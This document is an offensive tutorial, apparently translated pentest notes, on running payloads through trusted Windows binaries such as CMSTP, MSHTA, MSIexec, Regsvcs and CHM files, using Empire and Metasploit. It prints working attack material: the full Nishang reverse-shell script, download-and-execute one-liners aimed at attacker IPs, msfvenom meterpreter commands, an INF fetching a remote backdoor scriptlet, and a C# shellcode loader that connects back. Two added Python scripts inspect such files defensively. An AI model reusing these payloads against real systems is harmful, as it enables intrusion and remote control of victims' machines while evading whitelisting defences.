Contents
Local: Signed Script Proxy Execution
Regsvcs/Regasm (.NET Services Installation Tool / Assembly Registration Tool)
Trusted Developer Utilities
ATT&CK Execution: Dynamic Data Exchange (remote)
Introduction to Empire
Empire is a pure PowerShell post-exploitation agent built on cryptographically secure communications and a flexible architecture.
Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.
git clone https://github.com/EmpireProject/Empire.git
cd Empire/setup
./install.sh
./empire
Environment
Attacking machine: Kali, 192.168.243.133
Victim: Win7 x64, 192.168.243.154
- Set up a listener
- Start the listener
- Generate the payload
Run the generated payload file /tmp/launcher.bat on the victim (Win7 x64).
- Enter agents to see the agent that called back
Command-line interface (VPS is the author's placeholder for the host serving the script)
C:\Users\root\Desktop>PowerShell IEX (New-Object Net.WebClient).DownloadString('VPS/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.243.133 -Port 666
nc -lvp 666
Local: Signed Script Proxy Execution
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
Write a 1.sct file into the web root of the remote web server as shown below (the pubprn.vbs method):
root@kali:~# cat 123.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit" progid="Bandit" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true" >
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
The wscript method
Start Empire and generate a VBS stager
Set the listener address
Type "execute" to run it and generate the VBS code; use agents to list the agents
or
C:\Users\root\Desktop>wscript launcher.vbs
Each execution produces one callback, which yields the target agent
Get a shell
agents
(Empire: agents) > interact RWACGHYM
(Empire: RWACGHYM) > shell ipconfig
CHM
Introduction
The CHM file format is a help-file system based on HTML that Microsoft introduced in 1998 to replace the earlier WinHelp system. Windows 98 calls CHM files "Compiled HTML Help files". Everything the IE browser supports, JavaScript, VBScript, ActiveX, Java applets, Flash, common image formats (GIF, JPEG, PNG) and audio/video files (MID, WAV, AVI), is also supported in CHM, and a CHM can link out to the Internet through URLs.
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Create the malicious CHM file
SIP.html
<html>
<h1>blue team</h1>
<body>
Security
</body>
</html>
STA.html
<html>
<h1>blue team</h1>
<body>
Network
</body>
</html>
Index.html
<!DOCTYPE html><html><head><title>Mousejack replay</title></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe,-nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('192.168.243.134/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.243.133 -Port 666">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>
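The scriptlet above and the CHM index.html both hide their action in markup, so a defender's first check is static: parse the file, pull out the control it instantiates and the program it launches, and look for script that creates a shell object. The following Python is an added example (not code from the original notes or from any tool they mention); it uses only the standard library, and the two sample documents with their benign commands are constructed for it.

```python
"""Static inspector for the scriptlet (.sct) and CHM index.html shown above.

Added example, not code from the original page. It parses the markup with the
standard-library HTMLParser and reports two things a defender checks for in
such files: an <OBJECT> that instantiates the HTML Help ActiveX control
(clsid adb880a6-d8ff-11cf-9377-00aa003b7a11) with Command=ShortCut, plus the
program named in its Item1 parameter, and any inline <script> that creates
WScript.Shell. The two sample documents are constructed for this example.
"""
import re
from html.parser import HTMLParser

HH_CONTROL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
WSHELL_RE = re.compile(r'ActiveXObject\(\s*["\']WScript\.Shell["\']\s*\)', re.I)
CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)


class MarkupInspector(HTMLParser):
    """Collects OBJECT/PARAM pairs and raw script bodies while parsing."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.objects = []   # [{"classid": str, "params": {name: value}}]
        self.scripts = []   # one raw body string per <script> element
        self._obj = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}          # attr names arrive lowercased
        if tag == "object":
            self._obj = {"classid": a.get("classid", "").lower(), "params": {}}
            self.objects.append(self._obj)
        elif tag == "param" and self._obj is not None:
            self._obj["params"][a.get("name", "")] = a.get("value", "")
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "object":
            self._obj = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

    def unknown_decl(self, data):
        # Some parser versions surface <![CDATA[...]]> inside <script> here
        if self._in_script and data.upper().startswith("CDATA["):
            self.scripts[-1] += data[6:]


def inspect_markup(text):
    """Return a list of findings (strings) for one HTML or scriptlet document."""
    parser = MarkupInspector()
    parser.feed(text)
    parser.close()
    findings = []
    for obj in parser.objects:
        params = obj["params"]
        if HH_CONTROL_CLSID in obj["classid"] and params.get("Command", "").lower() == "shortcut":
            # Item1 has the form ",program,arguments"; the program is the second field
            fields = params.get("Item1", "").split(",", 2)
            program = fields[1].strip() if len(fields) > 1 else "?"
            findings.append(f"HTML Help ShortCut object launches {program}")
    for body in parser.scripts:
        code = "".join(CDATA_RE.findall(body)) or body
        if WSHELL_RE.search(code):
            findings.append("script creates WScript.Shell")
    return findings


# Constructed samples mirroring the structure of the files above (benign commands)
SCT_SAMPLE = """<?XML version="1.0"?>
<scriptlet>
<registration description="Sample" progid="Sample" version="1.00"
 classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" remotable="true">
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
"""

CHM_INDEX_SAMPLE = """<!DOCTYPE html><html><head><title>sample</title></head><body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe,-nop -w hidden -c Write-Output constructed">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
"""

if __name__ == "__main__":
    for name, doc in (("scriptlet", SCT_SAMPLE), ("chm index", CHM_INDEX_SAMPLE)):
        print(name, "->", inspect_markup(doc) or ["nothing flagged"])
```

inspect_markup() returns plain strings so it can be run over every .htm/.html/.sct extracted from a CHM or fetched from a web root; the HTML Help control's CLSID is the stable indicator here, the program name in Item1 is what changes from sample to sample.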
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.
The script is derived from Powerfun written by Ben Turner & Dave Hardy
.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.
.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444
Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.
.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,
[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,
[Parameter(ParameterSetName="bind")]
[Switch]
$Bind
)
try
{
#Connect back if the reverse switch is used.
if ($Reverse)
{
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
}
#Bind to the provided port if Bind switch is used.
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
#Execute the command on the target.
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
#Return the results
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
CMSTP
Introduction
CMSTP is the binary associated with the Microsoft Connection Manager Profile Installer. It accepts INF files, which can be weaponized with malicious commands to execute arbitrary code in the form of scriptlets (SCT) and DLLs. It is a trusted Microsoft binary that lives in the following two Windows directories.
Executing through cmstp.exe, which loads the supplied DLL or COM scriptlet (SCT), can bypass AppLocker and other application-whitelisting defenses as well as UAC.
C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
1. Generate the malicious DLL (pentestlab.dll) with msfvenom from the Metasploit Framework.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.243.133 LPORT=3333 -f dll > /root/Desktop/pentestlab.dll
cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\root\Desktop\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
2. The RegisterOCXSection of the INF file must contain the local path of the malicious DLL, or a WebDAV location for remote execution.
[RegisterOCXSection]
C:\Users\root\Desktop\pentestlab.dll
3. Configure the Metasploit multi/handler module to receive the connection.
4. When the malicious INF file is passed to cmstp, the code runs in the background.
cmstp.exe /s cmstp.inf
5. A Meterpreter session is obtained.
Local: CPL
Introduction
A CPL file is a Windows Control Panel extension item (CPL stands for Control Panel Item).
The system32 directory under the Windows installation holds a series of .cpl files, each corresponding to an item in Control Panel.
A CPL file is essentially a Windows executable, but not one that can run on its own; it is normally loaded through shell32.dll.
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
The first step is to create a DLL and rename it to .cpl so that it can be executed through Control Panel. Metasploit's msfvenom can build a custom DLL with an embedded Meterpreter payload, or Didier Stevens' cmd DLL can be used to bypass restrictions that block cmd from running.
1. Generate the payload with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.243.133 lport=3333 -f dll -o pentestlab.cpl
2. Set up the MSF listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.243.133
set LPORT 3333
exploit -j
3. The following command creates a registry value whose data is the path of the CPL file stored on the host. By default, standard users have write access to their own hive.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls" /v pentestlab.cpl /t REG_SZ /d "C:\cpl\pentestlab.cpl"
4. Open Control Panel to execute the payload, or run control pentestlab.cpl, and a Meterpreter session is obtained.
Session obtained.
Local: Forfiles
Introduction
forfiles is a built-in Windows command commonly used for batch deletion; it selects files by their modification-date attribute, which makes it a good choice for finding and deleting old files.
The forfiles command searches for specified files or folders on different drives and is convenient for updating software or running batch programs. Its syntax is: forfiles /p <folder or drive to search> /m <file type to search for> /s <recurse into subdirectories> /c <command to run for each file>
Full reference: https://www.jb51.net/softs/498793.html
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
1. forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Local: IEExec
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe http://192.168.243.133/evil.exe
InfDefaultInstall
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
InfDefaultInstall.exe shady.inf
[Version]
Signature=$CHICAGO$
[DefaultInstall]
UnregisterDlls = Squiblydoo
[Squiblydoo]
11,,scrobj.dll,2,60,https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Minimalist.sct
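Both cmstp.exe /s and InfDefaultInstall.exe act on an INF whose DefaultInstall section hands off to a RegisterOCXs or UnregisterDlls section, so the file itself can be triaged before it is ever installed. The Python below is an added example, not code from the original notes; it parses that structure and reports which binary or URL each referenced section would load, using the documented dirid,[subdir],filename,[flags][,[timeout][,argument]] layout of RegisterDlls/UnregisterDlls entries. The two sample INF texts, the C:\lab\sample.dll path and the example.invalid URL are constructed.

```python
"""INF inspector for the CMSTP and InfDefaultInstall examples above.

Added example, not code from the original page. Both techniques rely on an
INF whose DefaultInstall section points at a RegisterOCXs or UnregisterDlls
section; this script parses that structure and reports the binaries or URLs
each referenced section would load. The sample INF texts are constructed.
"""
import re

SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
# Directives in an install section that hand control to another section
DISPATCH_KEYS = ("registerocxs", "unregisterdlls", "registerdlls",
                 "runpresetupcommands", "runpostsetupcommands")
# http(s) URLs or UNC paths mean the code comes from outside the host
REMOTE_RE = re.compile(r"https?://\S+|\\\\[^\\\s]+\\\S+", re.I)


def parse_inf(text):
    """Return {section_name_lower: [lines]} preserving line order."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # strip INF comments
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name").strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def referenced_sections(sections):
    """Yield (install_section, directive, target_section) for each dispatch."""
    for name, lines in sections.items():
        if not name.startswith("defaultinstall"):
            continue
        for line in lines:
            if "=" not in line:
                continue
            key, value = (p.strip() for p in line.split("=", 1))
            if key.lower() in DISPATCH_KEYS:
                for target in value.split(","):
                    yield name, key, target.strip().lower()


def inspect_inf(text):
    """Return findings: one string per binary/URL an install section reaches."""
    sections = parse_inf(text)
    findings = []
    for inst, directive, target in referenced_sections(sections):
        for entry in sections.get(target, []):
            if directive.lower() in ("registerdlls", "unregisterdlls"):
                # entry syntax: dirid,[subdir],filename,[flags][,[timeout][,argument]]
                fields = [f.strip() for f in entry.split(",")]
                filename = fields[2] if len(fields) > 2 else entry
                argument = fields[5] if len(fields) > 5 else ""
                desc = filename + (f" with argument {argument}" if argument else "")
            else:
                desc = entry      # RegisterOCXs lines are plain paths
            remote = " (remote source)" if REMOTE_RE.search(entry) else ""
            findings.append(f"[{inst}] {directive} -> [{target}]: {desc}{remote}")
    return findings


# Constructed samples with the same layout as cmstp.inf and shady.inf above
CMSTP_SAMPLE = r"""[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection

[RegisterOCXSection]
C:\lab\sample.dll

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Sample"
ShortSvcName="Sample"
"""

INFDEFAULT_SAMPLE = r"""[Version]
Signature=$CHICAGO$

[DefaultInstall]
UnregisterDlls = Squiblydoo

[Squiblydoo]
11,,scrobj.dll,2,60,https://example.invalid/sample.sct
"""

if __name__ == "__main__":
    for label, sample in (("cmstp", CMSTP_SAMPLE), ("infdefaultinstall", INFDEFAULT_SAMPLE)):
        for finding in inspect_inf(sample) or ["nothing dispatched"]:
            print(label, "->", finding)
```

An INF that an installer would process legitimately rarely needs a DefaultInstall section that registers a DLL from a user-writable directory or from a URL, so the "(remote source)" marker and any path outside the Windows directory are the lines worth escalating.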
InstallUtil
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Tool: https://github.com/khr0x40sh/WhiteListEvasion.git
Example
Generate the payload:
python InstallUtil.py --csfile temp.cs --exefile temp.exe --payload windows/meterpreter/reverse_https --lhost 192.168.243.133 --lport 443
Walk-through
Build the binary:
.\csc.exe pentestlab.cs
Run the binary through InstallUtil:
.\InstallUtil.exe /logfile= /logtoconsole=false /u pentestlab.exe
Set up the MSF handler
Session obtained
Get a shell
MSHTA
Introduction
mshta.exe is a Microsoft Windows program (Microsoft HTML Application host) that executes .HTA files.
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Attack procedure:
1. Start the Empire framework on Kali and enter:
listeners
uselistener http
set Host http://192.168.243.133
set Port 8080
execute
Output
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://192.168.243.133
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > set Name mshta
(Empire: listeners/http) > execute
[*] Starting listener 'mshta'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) > listeners
[*] Active listeners:
  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  mshta             http            http://192.168.243.133:8080          5/0.0
(Empire: listeners) >
Generate the HTA file with Empire
usestager windows/hta
set Listener http
set OutFile /root/Desktop/1.hta
execute
Start a Python web server in the directory holding 1.hta:
cd /root/Desktop/
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)
Run on Win7:
mshta.exe http://10.100.19.19:80/1.hta   [the port the payload listener uses and the download port must not be the same]
Empire receives the victim's shell
MSIexec
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
1. Generate the payload with msfvenom
msfvenom -a x86 -f msi -p windows/exec CMD=calc.exe -o calc.png
2. Start a simple web server
python -m SimpleHTTPServer 80
3. On the local computer, have msiexec download the file and run the payload
msiexec /q /i http://192.168.243.133/calc.png
Pcalua
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
C:\windows\system32\pcalua.exe -a C:\file.lnk
C:\windows\system32\pcalua.exe -a notepad.exe
C:\windows\system32\pcalua.exe -a \\server\payload.dll   (executes a payload from a remote host locally)
Regsvcs/Regasm (.NET Services Installation Tool / Assembly Registration Tool)
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
1. Use PowerShell to produce key.snk
PS D:\> $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
PS D:\> $Content = [System.Convert]::FromBase64String($key)
PS D:\> Set-Content key.snk -Value $Content -Encoding Byte
2. Generate C# shellcode with msfvenom and copy it into a file named regsvcs.cs
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.100.19.19 LPORT=4444 -f csharp
![image](./images/7AF3D6434406451FB84F9676ED26B6C.png)
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

Create Your Strong Name Key -> key.snk

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
[OR]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll

//Executes UnRegisterClass If you don't have permissions
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll //This calls the UnregisterClass Method
*/

namespace regsvcser
{
    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }

        [ComRegisterFunction] //This executes if registration is successful
        public static void RegisterClass(string key)
        {
            Console.WriteLine("I shouldn't really execute");
            Shellcode.Exec();
        }

        [ComUnregisterFunction] //This executes if registration fails
        public static void UnRegisterClass(string key)
        {
            Console.WriteLine("I shouldn't really execute either.");
            Shellcode.Exec();
        }
    }

    public class Shellcode
    {
        public static void Exec()
        {
            // native function's compiled code
            // generated with metasploit: the windows/meterpreter/reverse_tcp stager
            // from step 2 (connects back to 10.100.19.19:4444)
            byte[] shellcode = new byte[341] {
                0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
                0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
                0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
                0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
                0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
                0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
                0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
                0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
                0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
                0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
                0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,
                0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x0a,0x64,0x13,0x13,
                0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,
                0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,
                0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,
                0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,
                0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,
                0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,
                0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,
                0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,
                0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,
                0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,
                0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5
            };

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data
            IntPtr pinfo = IntPtr.Zero;
            // execute native code
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
    }
}
3. Set up the MSF handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.243.133
set LPORT 4444
exploit -j
4. The Microsoft .NET Framework includes a C# compiler (csc.exe) that runs from cmd and can build the malicious DLL; key.snk is used to sign the resulting DLL.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs
5. Execute:
